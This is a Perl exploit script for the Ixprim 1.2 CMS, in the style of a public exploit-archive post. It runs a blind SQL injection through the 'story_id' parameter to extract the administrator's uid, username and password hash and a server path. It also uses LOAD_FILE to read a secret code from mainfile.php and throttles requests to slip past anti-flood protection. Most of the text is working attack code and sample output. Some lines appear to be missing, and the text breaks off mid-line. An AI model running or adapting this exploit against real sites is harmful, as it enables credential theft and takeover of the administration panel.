# ===========# Affected.scr..: Ixprim 1.2
# Poc.ID........: 16061221
# Type..........: Blind SQL Injection
# Risk.level....: Medium
# Conditions....: load_file privilege (ixp code only)
# Src.download..: www.ixprim-cms.org
# Poc.link......: acid-root.new.fr/poc/16061221.txt
# Credits.......: DarkFig
# =========# header> Ixprim 1.2 Remote Blind SQL Injection Exploit
# header> ============================================# status> Searching if someone posted a comment
# sploit> story_id=2
# status> Searching the administrator's uid
# sploit> 1
# status> Searching the administrator's username length
# sploit> 4
# status> Searching the administrator's username
# sploit> root
# status> Searching the adminitrator's password hash
# sploit> 7b24afc8bc80e548d66c4e7ff72171c5
# status> Searching a full path disclosure
# sploit> /home/www/ixprim-1.2/html/mainfile.php
# status> Searching the confidential ixp code
# sploit> c998aa6188034690aab6565c0099fe0a
use HTTP::Request::Common;
use LWP::UserAgent;
use HTTP::Response;
use Getopt::Long;
print STDOUT "\n header> Ixprim 1.2 Remote Blind SQL Injection Exploit";
print STDOUT "\n header> =============================================\n";
my $opt = GetOptions(
'host=s' => \$host,
'path=s' => \$path,
'proxh=s' => \$proxh,
'proxu=s' => \$proxu,
'proxp=s' => \$proxp);
if(!$host) {
print STDOUT " header> Usage..: xpl.pl -host [host] -path [path]\n";
print STDOUT " header> Options: -proxh [host] -proxu [user] -proxp [pass]\n";
$host = $host !~ /^http:\/\// ? "http://$host" : $host;
$path = defined($path) ? $path : "/";
my $ua = LWP::UserAgent->new();
$ua->proxy('[http]' => $proxh) if $proxh;
my $req = HTTP::Request->new(GET => $host.$path.'ixm_ixpnews.php');
$req->proxy_authorization_basic($proxu,$proxp) if $proxu;
$res = ($ua->request($req))->content;
print STDOUT " status> Searching if someone posted a comment\n";
# There is more than one sql injection, but this one is the most
# interesting to exploit. The parameter 'story_id' isn't properly
# sanitised before being used in an SQL query. URL Rewriting option
# supported.
if($res =~ /(story_id=||news-art)([0-9]+)(||.html)">([0-9]+) (commentaire||comment)/) {
$story_id = $2;
$bsql = $host.$path."ixm_ixpnews.php?file=article&story_id=$story_id";
print STDOUT " sploit> story_id=$story_id\n";} else {
print STDOUT " status> No comment posted\n\n";
print STDOUT " status> Searching the administrator's uid\n";
$uid = sendreq(1,1,"select%20uid%20from%20ixp_users%20order%20by%20uid%20limit%200,1");
print STDOUT " status> Searching the administrator's username length\n";
$admlg = sendreq(1,3,"length((select%20uname%20from%20ixp_users%20where%20uid=$uid))");
print STDOUT " status> Searching the administrator's username\n";
print STDOUT " status> Searching the adminitrator's password hash\n";
print STDOUT " status> Searching a full path disclosure";
$req = GET $host.$path.'kernel/plugins/fckeditor2/ixprim_api.php';
$res = ($ua->request($req))->content;
if($res =~ /in (.*?)kernel(\/||\\)/) {
$fpd = $1.'mainfile.php';
print STDOUT "\n sploit> $fpd\n";} else {
print STDOUT "\n status> Can't get the full path disclosure";
# A personal code who is stored in mainfile.php protect the administration panel
# // Code personnel CMS
# define("IXP_CODE", 'c998aa6188034690aab6565c0099fe0a');
# This code is generated by the function code() stored in install.fct.php
# function code($param='1')
# {
# $number = rand(1,1024);
# $temp = md5(($number*time()).$param);
# $temp = substr($temp, 0, 8);
# return $temp;
# }
# $param = $host.$path and $temp can be modified by the user.
# After the request sent, the script create the sql tables and the time()
# when it created them is stored in the mysql database, we can retrieve it with the sql
# injection and IF the user don't modified the generated code, we can find the personal code.
# The time during the creation of the table and the generation of the code
# is not the same, but we can try to bruteforce it with some parameters.
# But the user can change the generated code ... that's why i decided to use the sql
# injection with load_file and regexp.
print STDOUT " status> Searching the confidential ixp code\n";
# Example with "C:/Program Files/EasyPHP1-8/www/ixprim-1.2/html/mainfile.php"
# magic_quotes_gpc=off
# =================== # [SQL] and LOAD_FILE("C:/Program Files/EasyPHP1-8/www/ixprim-1.2/html/mainfile.php")
# REGEXP("define(\"IXP_CODE\", '[PART_OF_IXP_CODE]");
# magic_quotes_gpc=on
# ================== # [SQL] and LOAD_FILE(concat(char(67),char(58),char(47),char(80),char(114),char(111),char(103),char(114),
# char(97),char(109),char(32),char(70),char(105),char(108),char(101),char(115),char(47),char(69),
# char(97),char(115),char(121),char(80),char(72),char(80),char(49),char(45),char(56),char(47),char(119),
# char(119),char(119),char(47),char(105),char(120),char(112),char(114),char(105),char(109),char(45),
# char(49),char(46),char(50),char(47),char(104),char(116),char(109),char(108),char(47),char(109),char(97),
# char(105),char(110),char(102),char(105),char(108),char(101),char(46),char(112),char(104),char(112)))
# REGEXP(concat(char(73),char(88),char(80),char(95),char(67),char(79),char(68),char(69),char(34),char(44),
# char(32),char(39),char([PART_OF_IXP_CODE])))
&sendreq(1,32,"load_file(concat(".concatchar($fpd).")) REGEXP(concat(".concatchar("IXP_CODE\", '"));
# Determine if the sql request return true or false.
# Modify the username's charset if it contain special char.
# sleep(2) needed for bypass the antiflood protection.
# If the username's length > 19 the exploit doesn't works.
sub sendreq() {
my($start,$limit,$sql) = ($_[0],$_[1],$_[2]);
my($gchar,$char) = '';
@charset=(0...9) if $sql =~ /^(length|select%20uid)/;
@charset=(a...z,0...9) if $sql =~ /^select%20uname/;
@charset=(a...f,0...9) if $sql =~ /^(select%20pass|load_file)/;
for($y=$start;$y<=$limit;$y++) {
foreach $char (@charset) {
print STDERR "\r sploit> $gchar$char";
if($sql !~ /load_file/) {
$req = GET $bsql."%20and%20substr((".$sql."),$y,1)=".concatchar($char);}
else {
$req = GET $bsql."%20and%20".$sql.",".concatchar($gchar.$char)."))";}
$res = ($ua->request($req))->content;
if($res =~ /